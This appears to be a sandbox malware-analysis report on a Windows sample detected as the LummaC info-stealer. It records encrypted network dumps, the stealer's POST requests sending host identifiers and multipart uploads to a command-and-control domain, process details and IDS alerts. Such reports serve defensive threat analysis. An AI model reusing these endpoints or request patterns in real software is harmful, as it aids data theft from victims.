2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 79 94 1e d9 b5 e3 a5 be af c2 dc 01 2f a1 e2 aa 03 a5 7a d6 58 49 7a 97 2c 39 31 f4 a1 a3 2b 20 78 2a f7 ac 81 dc c4 88 fb b9 eb dc 80 6a e4 9d 14 3d ab af ce 7b 8d 5b cd eb e4 49 d2 5d ad 13 5d 34 6c 9d 98 0f fc c6 f0 ae ca 8f 84 e7 22 f3 42 00 c0 9c 66 54 99 1a 58 0d d3 ad 40 06 7c 0a 98 0a 48 20 79 53 42 fe 5c 6b 31 f5 5d 51 20 69 2b 11 18 95 f0 56 cf 47 49 e7 f1 d6 9b e7 a5 0b be f0 4c 87 70 7e 33 05 d8 e9 af 85 e5 6b 9d 15 90 80 94 34 32 48 d1 07 d6 38 eb 9f b8 5a e3 32 9b 23 2c 96 84 9c ed 41 58 a2 49 ac 4d 44 4f 6b d9 78 30 04 15 ed 3a 8e 2d ff d0 cb b6 df cd 90 9f 93 9c 1e 94 82 aa 17 28 a6 7c 32 1e 7d 01 c0 28 76 f9 c0 b3 5e ad f0 7b 2e 50 c1 a8 78 99 2d 8e 27 57 84 f5 d2 43 a9 c0 b2 00 0b c3 10 9f a8 8b 98 2d fe 29 21 fd 97 d8 94 ee 77 0a ea 3a Data Ascii: y/zXIz,91+ x*j={[I]]4l"BfTX@\|H ySB\k1]Q i+VGILp~3k42H8Z2#,AXIMDOkx0:-(\|2}(v^{.Px-'WC-)!w:
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 6a d8 83 c9 f4 19 78 7e 8f 1d ea 7b 02 69 14 87 1e 2e b7 15 33 10 53 9a 54 2c 4f ce 31 cc a8 8d 1a 87 73 5f 99 14 de c3 db d4 22 67 b2 00 06 77 ec fd e8 cc f6 9f 46 55 f4 31 ba 05 fe ef 73 a3 dd 2c 88 94 8d 58 9f 1f e4 ac db 52 55 8c db 63 03 af 62 e7 8b 96 93 fe 21 fe e7 3f ad d0 3d c8 18 f8 1d bb 40 70 da 01 8f 0f 60 15 19 36 8e 6e 9b fb 15 b1 fe af 96 65 61 58 ca 56 3c c9 96 9b 59 c1 9b 3c a3 2d 7e 8e d2 6c ed 1f 42 24 d6 76 9f a4 30 d5 46 9c 94 a2 57 d2 49 43 79 a0 a7 7b f6 21 57 ea 6d 3b a8 e7 d2 b6 b7 8c 3b 19 31 03 f1 45 6c 18 f4 f8 d3 86 08 1c 1f f8 49 d5 d4 bb 1c ed d4 2f 82 c7 17 e9 56 15 4e 1b 76 8f aa 80 02 b6 54 03 dd b2 18 31 25 73 64 a9 3c af 41 b1 64 38 d1 64 c6 17 49 0a 07 2c 6c 3d 99 02 90 eb 42 88 12 ba d9 fb 21 72 ea 16 e9 5b 63 0d 92 Data Ascii: jx~{i.3ST,O1s_"gwFU1s,XRUcb!?=@p`6neaXV<Y<-~lB$v0FWICy{!Wm;;1ElI/VNvT1%sd<Ad8dI,l=B!r[c
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: a5 79 0a f9 bd 51 2c 87 99 5f df ac da 08 88 02 d3 c3 f5 32 74 2c c7 be 7b 10 80 5d fe 89 b4 20 6d c6 da a9 78 e6 54 16 b7 00 a6 c9 99 d0 5f 1d 5e 77 89 53 d4 ac 75 72 db 91 a9 88 57 17 da bb e5 d7 14 4d d4 24 44 1f 0c b3 51 50 a1 1d 75 fc 05 4e 25 d3 ca 72 7e 0f b4 21 d4 de f2 60 66 aa 76 f8 bb 96 ea 14 e3 35 8b 08 ca 1a 00 4a a0 fc be bd 8c d7 d8 5a cd bf fd 05 0a 62 17 b5 67 0f a7 c7 14 2e 6f 0b 02 9a 01 ca c6 5f cd 65 7e 06 69 7d 7b 2b 24 b4 47 ae bc 4e 17 69 9a e7 c1 e0 2a 72 3d dc a3 ee 7e f4 0a ae 34 f2 b9 dc b7 5f 91 40 e7 2f 22 1d 7c 7c 4c dd 60 39 89 9a 9b b6 c5 3b 89 2e 70 25 9f f8 b3 4c bb d5 f0 71 50 a4 92 d8 d1 31 f7 f3 be 5d e6 25 ba 6e 39 2b 69 75 f4 f5 28 0d 4e 80 b8 85 aa 85 68 e5 ea 84 7c d5 38 d1 3d 79 1e 48 29 7c 13 8a 7b 0d 36 a2 c9 Data Ascii: yQ,_2t,{] mxT_^wSurWM$DQPuN%r~!`fv5JZbg.o_e~i}{+$GNi*r=~4_@/"\|\|L`9;.p%LqP1]%n9+iu(Nh\|8=yH)\|{6
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 6f eb 3e 5a 2c 35 a0 f6 96 08 6d 07 5b 5b 37 95 ec 80 64 ae 48 ae ca 77 db 43 6f 8f 7c 6f ab a8 03 a9 00 20 d5 55 9c 23 99 4c 05 8d 09 8b 20 7d 6e 51 87 db 6c e4 bd 25 68 b4 6f d2 48 8a b2 4e 97 8f a2 34 2a dc 74 8a 25 9e bf d6 49 b9 73 82 1e 4d 31 8b 1d 83 6b ce a5 62 2f 7a 5b 3c 31 da c9 02 5c 32 f8 12 53 b2 43 e9 3b e6 86 f4 36 48 19 36 e9 10 ba b6 61 fc 9c 7e c5 fb 35 6b 73 f5 d7 64 e0 cc 1e 63 5d 89 34 3d 06 27 6e 52 ce 8c d4 8f b0 8d 3a 13 9e ae 1e dd b2 4c f7 ec 7b 5f 91 2f a4 4e cd 1f 3d d9 82 d8 c5 d4 66 b8 7e 47 92 2c 2a 43 60 5c 85 4e dd 4c 0a b7 41 00 ab c1 d0 ca aa 4c b9 7d 59 0d 55 02 67 d1 9e b9 99 3c dc 16 9e a0 4b a2 5f c6 7c 1c 25 e1 66 05 69 88 df c6 38 b6 05 5a 6b fd 55 e9 7a 6c c5 03 2b 60 56 9c b7 0d c4 ed b6 4b af 0f 2b 76 ca 41 5b Data Ascii: o>Z,5m[[7dHwCo\|o U#L }nQl%hoHN4t%IsM1kb/z[<1\2SC;6H6a~5ksdc]4='nR:L{_/N=f~G,C`\NLAL}YUg<K_\|%fi8ZkUzl+`VK+vA[
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 28 fe 48 8d 77 f0 47 55 96 64 9d 2f f0 6f 3e ba 78 d2 b3 fc c7 5f 35 c5 a7 9b 40 5d 8c 91 f6 d0 94 83 09 ce d9 6f d2 b2 90 7e 68 6c 58 0f 4a 40 9f e0 3a 2e 5b 9e fe 5f 25 58 42 7a ca c0 ab 02 36 4d 00 77 97 48 ac d5 c2 8f 99 2c 85 97 1c 01 b4 ba b3 0f 39 c7 4d db 99 c6 2b a8 2e 7d 8d 49 fe ce 3a 48 fe be f7 34 6d be 63 c2 92 4c 88 98 6e 56 bd 1b 98 7e c0 50 43 00 7b ca 24 a0 a7 68 a1 4d 9b e7 a7 0a 14 0d 45 d5 f1 6b d5 41 22 07 1d d0 8d 06 f6 7b e9 9b 77 92 e2 da 0d 19 bd 1c fe 49 13 d5 20 31 5c b6 ff d0 56 e0 58 b2 96 32 d5 7f eb 2c 77 31 2f 50 62 ef a6 82 8e 13 69 10 e4 6f 52 1b 55 c9 cf 5e 99 1a 80 ee a2 b0 b5 86 9f a1 f7 e2 53 97 58 72 c0 d1 ed b1 5c 24 98 f4 c7 67 db d1 8f fc 6f c2 2b a9 89 2f c6 b7 6d f1 af 91 39 9d 57 9c e1 c1 cb 60 42 67 56 45 91 Data Ascii: (HwGUd/o>x_5@]o~hlXJ@:.[_%XBz6MwH,9M+.}I:H4mcLnV~PC{$hMEkA"{wI 1\VX2,w1/PbioRU^SXr\$go+/m9W`BgVE
2025-03-10 14:32:09 UTC	828	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:32:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Te%2BQk2uyUw8GQxAq1D4%2BmHgxUW6hsXp22mHsSEEfOZShjNJ%2BZVWA%2FZokYIrEf0amL%2B%2B01su1YoSu31tb4s%2FCs3NP9qCrcm64lMCIiVAhdkYppnxL1xS3rNDLL5fIQMzN%2FpMs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e3848b88213be5-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28707&min_rtt=28016&rtt_var=9077&sent=229&recv=424&lost=0&retrans=0&sent_bytes=2841&recv_bytes=554786&delivery_rate=93515&cwnd=250&unsent_bytes=0&cid=8c28e55184f8c84c&ts=21847&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49701	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:32:11 UTC	268	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 103 Host: astralconnec.icu
2025-03-10 14:32:11 UTC	103	OUT	Data Raw: 75 69 64 3d 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 26 63 69 64 3d 26 68 77 69 64 3d 43 32 38 38 43 41 39 43 41 36 41 42 36 33 41 43 33 33 44 37 35 35 33 31 36 32 37 45 31 31 32 30 Data Ascii: uid=e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c&cid=&hwid=C288CA9CA6AB63AC33D75531627E1120
2025-03-10 14:32:12 UTC	783	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:32:11 GMT Content-Type: application/octet-stream Content-Length: 10451 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXJn53QLDT%2FQ9CVtJci0rUyC2rfKinubSPyJJwbQUo6znponvUKJNzvaLi%2Bx15OmVDE%2FVObF4JLE6J0RwxkvUd00qBQbHcIX06Zh3uIQikhirSzYyA1zwxdczB4JrSpV0K3G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e3852158dc3bf1-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29484&min_rtt=28115&rtt_var=10479&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1007&delivery_rate=78847&cwnd=251&unsent_bytes=0&cid=9148ae72015a5df4&ts=743&x=0"
2025-03-10 14:32:12 UTC	586	IN	Data Raw: ef 62 9e f1 7f d7 5b 72 56 14 9a ea 00 28 11 f5 cf 8f fa 49 04 08 f9 36 55 79 e5 10 e7 e5 16 a3 06 a1 dd b4 62 37 1c 6d 9d db 58 cf 32 0a 36 62 ca 91 32 78 02 be 09 f7 1a 1f 73 30 d2 9d c6 5a c3 4d 22 94 d2 32 54 a1 65 43 41 2a 71 b5 d9 1f 58 8e 00 54 91 5f 8e 76 40 b6 75 6d 9c 6e b9 30 b8 c9 3f 74 ba c2 7e 51 70 35 d1 5e e0 68 6b 9b e9 17 e7 72 41 fe ff d4 93 a7 80 94 1f 93 19 7b d2 64 13 49 66 cf ee 61 ad 27 7e 70 ce 45 bc a3 3e 1f 84 5d bf bc 02 e9 37 95 d7 ce 14 0e 6a c5 ca 59 f7 65 5e 94 2c e0 a7 49 68 98 74 4c 6e 67 6a 18 68 5b 50 51 c4 84 04 ab 93 84 ed e1 62 7d a9 60 61 81 31 6b d0 96 ac 15 70 01 90 56 d8 df 99 1a 00 4f 5c c3 c1 81 65 ce c6 db b1 b3 f1 2f 27 17 c4 93 23 8d 0c 33 25 9f d7 4d 0b bc fe a1 91 e2 27 6c 27 ee 31 00 ad 1a e7 04 70 e7 62 Data Ascii: b[rV(I6Uyb7mX26b2xs0ZM"2TeCA*qXT_v@umn0?t~Qp5^hkrA{dIfa'~pE>]7jYe^,IhtLngjh[PQb}`a1kpVO\e/'#3%M'l'1pb
2025-03-10 14:32:12 UTC	1369	IN	Data Raw: 66 5d fa a6 b8 6d 89 5d f2 6a 3e 51 eb 85 09 17 17 61 15 86 72 f3 3a 16 d1 6f e9 ef ab 51 46 01 3a dc e9 35 63 2c 4f 20 3c 29 ba aa 5a e9 02 5c ab c9 59 f1 88 53 dc 3a cf ae 83 c6 c4 b3 6b df a8 a9 bc da cc f5 54 19 95 dd 88 c8 49 4c 58 6c d0 53 95 84 4b 6d cc 4c e1 3e df 67 fe df 7c f7 21 b1 2f 43 e8 39 83 08 bc b6 f3 78 f0 09 5a 4f d2 e2 de 86 f3 c8 ba 07 ac 76 34 cd 5f 98 45 aa a0 b1 14 a5 18 61 8c af 68 19 0d ce 53 a4 0f fa d5 8f ca 0a b2 0c 4e e1 07 02 57 87 1d 5f 6b cd 39 c1 6d 5a de 21 a6 50 61 3e fc af ca 4d 7f 32 2a 68 d6 e3 01 9e 9c 5c 4a b0 79 7f a1 df f2 90 08 64 5f d3 2e ef 8e 8e 7a 7b 7a 17 ce 6e f9 5e cc bf 83 fa bc 16 02 ef ff f2 67 29 e6 84 89 38 c2 03 d6 e9 04 64 2b ab 8a 0d 3b 7a d6 1f 75 92 1e c0 bf 80 91 05 b7 f9 bd ba a0 90 c9 a5 30 Data Ascii: f]m]j>Qar:oQF:5c,O <)Z\YS:kTILXlSKmL>g\|!/C9xZOv4_EahSNW_k9mZ!Pa>M2*h\Jyd_.z{zn^g)8d+;zu0
2025-03-10 14:32:12 UTC	1369	IN	Data Raw: 97 66 90 8a 99 a2 1d 27 6b cc e5 ba e4 24 32 b4 ae 6a c4 28 4a d2 4f 5f 04 73 4a b6 c6 4c 2c 21 25 27 e7 d5 67 fa ae 66 b3 b5 46 39 79 07 c2 2b cf 62 92 e8 ff 66 d0 c8 91 08 1f 25 3c f1 09 8d 36 89 ef b7 25 01 f9 f8 c6 f4 76 83 6a c8 62 1f fa fa de b5 68 d9 0a c7 12 2b cd bb 28 8c f9 91 8d aa c0 1e ef 4e 5a da 29 eb dc f9 e3 99 44 1a b6 45 a7 a7 0f 87 5c b5 2e 5a b5 d2 a3 b4 c4 b5 34 db 25 73 e7 68 8c 35 e3 c0 c4 cb 9b 8b b4 fb 83 2a 71 a9 56 6b a0 bc e4 d1 9f 47 2d b2 9e 1e cf 77 9d 4f ae 21 98 ba a4 51 73 b4 cc 90 a9 20 78 37 87 37 3d d0 ac af 13 a2 73 b7 47 1f c2 5c f4 10 5a ab c9 04 ad aa 68 b7 70 16 8e 25 d5 1b 92 cc 7d ff a5 a9 f1 f3 38 9c 63 c5 af 38 bf 10 19 02 a2 5d a3 c1 d0 9d 15 d8 e2 cc b4 6d 77 ce 59 bd c7 7c 55 24 6e 9b 36 ea 0e de da e8 21 Data Ascii: f'k$2j(JO_sJL,!%'gfF9y+bf%<6%vjbh+(NZ)DE\.Z4%sh5*qVkG-wO!Qs x77=sG\Zhp%}8c8]mwY\|U$n6!
2025-03-10 14:32:12 UTC	1369	IN	Data Raw: eb 84 42 1a ab 9d 15 b8 da 8a 3e e7 32 1b 48 07 34 7e 42 fb 6c f7 6d 31 70 b4 ed 45 3f 6c d9 6a e4 17 28 4d 20 8d 81 af b8 a1 00 ee d8 82 a3 92 c6 dd 57 33 7c 98 34 fa ad 3e bd 3a 3a 63 39 93 b0 20 b4 cd 6b 12 fa 1b de a7 0f 36 6c df a9 66 d9 8c 89 8b 21 fc 5b 3d 57 9a 70 cb 06 bb ce 50 42 b5 89 69 7b 6d 47 30 c1 35 d5 c7 6f 0d dc 05 35 27 96 24 36 25 62 32 53 1d ff e5 af 50 99 90 d8 92 85 d7 88 2b 21 3c 71 51 08 f3 9f 78 89 3c 3d ed f5 e5 38 3d 58 84 d7 2c 65 13 14 db 81 52 28 03 c5 89 84 e5 ec f6 cf 5a 2b 7c 1e ef cd bb 58 1e ce 04 f8 0b 3d 92 5f c1 2f 51 f5 67 63 bf f1 45 9d 44 cb 93 b5 7c 44 b4 85 cf 51 99 21 14 3a 43 0d 5b e6 02 28 03 26 47 21 cc c8 d1 f5 9f bd 72 40 2a 96 2b c8 73 c8 49 e9 46 d0 51 36 36 07 48 6e e9 8d 4e 1d 86 94 19 df 69 16 14 6d Data Ascii: B>2H4~Blm1pE?lj(M W3\|4>::c9 k6lf![=WpPBi{mG05o5'$6%b2SP+!<qQx<=8=X,eR(Z+\|X=_/QgcED\|DQ!:C[(&G!r@*+sIFQ66HnNim
2025-03-10 14:32:12 UTC	1369	IN	Data Raw: b1 f7 dc 4e f2 8a a7 bc a2 c0 88 7a 05 af 40 27 da 2a 9f 06 c4 f8 35 9b 83 3f 26 a1 3f a7 b7 cd 24 22 39 92 1b 89 4a 4b 45 5d cd 63 d3 2e 1f 11 39 f7 5b cd cd 14 d0 7d 91 15 23 9f f0 45 eb 0c 68 7f e5 0c f6 f9 dd 58 69 5d b0 31 0e 98 ed 5f d2 5b 04 ea 62 ad ed db 4a 26 e3 b5 b8 fe 78 b0 56 d2 5b 44 d1 3e c8 b5 c2 85 61 2e ed eb cb 0c 28 64 ff f1 af a0 95 c2 d3 4e 98 d5 37 5b 39 05 fa d4 dd 42 e3 35 86 a8 a3 50 83 08 94 06 1f bf 75 8a fd c5 83 07 30 53 83 a4 4b bc a9 42 c8 85 cd 0f 29 3b 07 e7 80 aa 95 a3 d7 17 02 10 4b 3c b6 3c 36 98 9f a4 2f ba f9 c9 af 64 56 7e ae fa 15 ca 73 cd 6b ee f2 22 27 8a f5 64 e3 9b d1 a0 a8 4f c3 b0 79 a9 f2 f6 af fc b0 65 0b d8 be da 61 d5 22 02 88 f4 90 40 cf 04 31 b4 ff 79 72 49 9c 6f 8c 66 9c f7 14 88 e6 27 78 41 28 1f c5 Data Ascii: Nz@'*5?&?$"9JKE]c.9[}#EhXi]1_[bJ&xV[D>a.(dN7[9B5Pu0SKB);K<<6/dV~sk"'dOyea"@1yrIof'xA(
2025-03-10 14:32:12 UTC	1369	IN	Data Raw: c8 96 a8 8d e5 b0 ba a2 fc 57 8f cf aa 5c 9b 17 64 fb e9 12 fb bd f9 b6 3f 4d d1 9d ca 2b fe 63 ab 7b 8b cb 5c 47 00 22 dc 0b 55 97 6d 72 28 b7 c5 3c 62 89 35 3c 5c d0 c8 c9 98 13 20 3f 4f c9 1f e4 22 e5 e1 89 88 fe b2 1c 8b 29 c2 80 d5 4d c0 da 20 0d 55 35 84 8f eb d2 3c 76 57 3e d2 f0 e1 fd e7 90 93 2a ee 1e 97 5d 9a a4 94 c8 56 66 df cf 21 1c cb 41 f1 a2 29 b4 8d 41 06 ec fb 63 c6 c4 7a 31 0e de bc 10 37 cf 92 c8 82 34 7d 3b aa a5 b4 2a 25 a3 1b d6 7a cf ef ba 19 e2 e7 c6 6b 10 fb 42 35 2e 70 2e e9 1b dc 97 0d 75 c8 ea d8 9e 38 95 47 e1 e1 32 03 5d c5 e8 1a 09 9e da 98 de 27 5b 0b 79 b1 70 fa f3 77 11 a0 d6 d3 bd 20 6b be 27 a5 f6 9f 36 d6 b9 58 4e 2d 31 77 aa 57 a9 6c 15 4e 89 bb 97 e3 f6 2c 15 25 7b f0 96 f7 8d f5 f0 71 c1 1c 34 95 90 1b f2 41 2f 1a Data Ascii: W\d?M+c{\G"Umr(<b5<\ ?O")M U5<vW>]Vf!A)Acz174};%zkB5.p.u8G2]'[ypw k'6XN-1wWlN,%{q4A/
2025-03-10 14:32:12 UTC	592	IN	Data Raw: ca cc 06 79 83 d9 7b 56 b1 33 da 0b d8 89 9f 3e b3 9b 55 f5 a5 96 73 2b d6 23 8f c1 73 c1 4e 79 87 cc 9b 31 2b 67 66 03 37 39 76 a2 37 50 97 05 3f a2 33 0d f4 23 fc 1b a5 c0 3e 14 85 ca 87 c6 d2 14 25 e3 0a 39 6e fc 37 9b 17 82 d2 0d 87 f8 7e be ee c4 1a 05 a3 36 b3 00 ce 35 86 c1 e7 f2 ea 90 9b 78 40 3f d1 b0 5e 50 8b f9 92 03 cf ac 77 f0 71 02 3a 5d d2 70 bc 70 0c 37 f5 8d 7f 4d 6e fd 24 a3 5c f0 66 3c 58 62 5e be 8d 16 e4 88 42 5f 0e 8c 6f eb 90 f4 6f fc 71 9f 35 38 a8 d8 1e c1 75 11 10 47 58 ed 63 8f 80 86 19 d3 7b 52 7f 42 02 06 58 e4 b8 05 cb b2 de 24 03 2e 2c 11 a9 e6 a4 d8 8f 19 18 6a b9 98 4d 90 c3 95 9d 45 97 4e 63 d5 5e d4 18 19 88 7e 41 a0 f4 5b 4e b5 bb fb 3e 82 0f 26 a4 65 a4 95 ad f7 2f 9b fe 87 3f ad 03 41 dc ce 6d 64 2d 1a 58 ed 60 4e c8 Data Ascii: y{V3>Us+#sNy1+gf79v7P?3#>%9n7~65x@?^Pwq:]pp7Mn$\f<Xb^B_ooq58uGXc{RBX$.,jMENc^~A[N>&e/?Amd-X`N
2025-03-10 14:32:12 UTC	1369	IN	Data Raw: 4f 9a 7a bf 31 db 0d 42 dd 83 8a 09 fe 28 f0 2a aa 57 a8 76 2d 1b cc 97 a7 74 73 03 86 c7 28 9d b0 ad 28 05 2f e8 f4 9d 76 b3 8a af be 96 56 3a 81 c3 2b 25 c5 1a db d4 b4 bf e3 ce b1 51 fb c9 61 55 42 35 11 da 1c 47 7a 02 f9 8e a7 0b c1 f6 71 7c 92 97 20 e2 08 60 3f 08 3c db 4f ac 44 96 72 9a fd a1 b7 3f ea 01 2e db 9a 68 af d3 9b ff a5 44 11 04 f6 51 be dc cb 51 53 32 f4 2e 21 87 17 ea c0 76 ff 01 2e 37 79 70 5d 00 6d da e4 06 10 ca cd dc 25 62 1b f3 2d 15 dc f3 9e 1c ae c1 a3 0a 3c 00 62 a7 8c 5b 72 e9 d2 6d 9e 92 4b ec 49 bb ba 2d 35 61 43 51 25 e1 4c 24 99 74 f3 65 38 d8 45 24 cb fe 6e 27 6f a9 5e ba 57 dd 39 43 e4 35 fe ec 97 12 45 27 a5 70 f3 2c a5 6c 47 22 b2 44 ea 71 16 88 11 b1 b9 2b 21 a4 03 c8 e3 c5 58 0f 42 0f ea da eb ce d9 86 9a 27 b7 77 8e Data Ascii: Oz1B(*Wv-ts((/vV:+%QaUB5Gzq\| `?<ODr?.hDQQS2.!v.7yp]m%b-<b[rmKI-5aCQ%L$te8E$n'o^W9C5E'p,lG"Dq+!XB'w
2025-03-10 14:32:12 UTC	1059	IN	Data Raw: ee 7b 40 02 11 c9 31 8a 31 a4 24 c4 b2 46 fc 73 ce 4b 77 31 1a 7b 0a a8 6e df 26 44 33 de 6c 4e bf 98 ed 08 b9 4e 2b 60 72 49 4d 3a 69 99 b0 05 4c a7 ba 15 67 e4 c6 67 0e c8 ac 73 40 d1 0f 09 14 60 4f ad 3e 21 0d b4 e7 b3 3a 79 05 2a 61 fd 71 64 8d 3e b3 b4 3a 81 11 b8 da c7 ba 3b d8 c5 80 16 26 fb 51 d9 63 00 ba 74 c0 d8 82 83 f1 ca 10 d0 1c ab d6 d1 4c 90 cb 6a 1c 97 03 b0 c5 4a 11 9a 17 75 c9 cb a7 d9 a5 c4 8d 3c 14 6b 5f 93 81 42 ad 82 be 04 1a 2a d1 96 7d 42 62 e5 27 43 a0 ac ef 9c c7 69 c2 74 df 96 fc d5 dd 7f f9 54 7d aa e8 a0 70 ab 9b 51 bd 9d fc 11 05 ec 35 21 70 b4 27 de 00 8e b0 57 bd f8 49 58 5b 67 97 85 a7 db 29 d9 f5 2e 78 6d c4 5a 82 25 9d 67 66 a8 56 77 bf 9a 09 2b 31 76 2f 6f 2f 06 5b 26 90 44 58 da 0a 19 b2 9f dd 94 00 d1 6f fd a2 e0 04 Data Ascii: {@11$FsKw1{n&D3lNN+`rIM:iLggs@`O>!:yaqd>:;&QctLjJu<k_B}Bb'CitT}pQ5!p'WIX[g).xmZ%gfVw+1v/o/[&DXo

Target ID:	0
Start time:	10:31:02
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\Superority.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Superority.exe1.exe"
Imagebase:	0x720000
File size:	37'082'112 bytes
MD5 hash:	56EC4FE0D12094A8750B70B3A0BF54BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:31:03
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\Superority.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Superority.exe1.exe"
Imagebase:	0xda0000
File size:	37'082'112 bytes
MD5 hash:	56EC4FE0D12094A8750B70B3A0BF54BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2375512214.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	10:31:04
Start date:	10/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 820
Imagebase:	0xfd0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: https://astralconnec.icu/w	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu:443/DPowko	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/O	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowko4	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowkoT	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowkor	Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowko	Avira URL Cloud: Label: malware

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49696 -> 104.21.77.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49697 -> 104.21.77.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49690 -> 104.21.77.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49688 -> 104.21.77.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.77.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.77.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 104.21.77.86:443

Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: astralconnec.icu
Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6B7LeHdwdaUtAJzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14507Host: astralconnec.icu
Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=jaXU535mvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15039Host: astralconnec.icu
Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SJ6zerX1C2H2Ztbd81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: astralconnec.icu
Source: global traffic	HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=twxx1gZ6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2601Host: astralconnec.icu
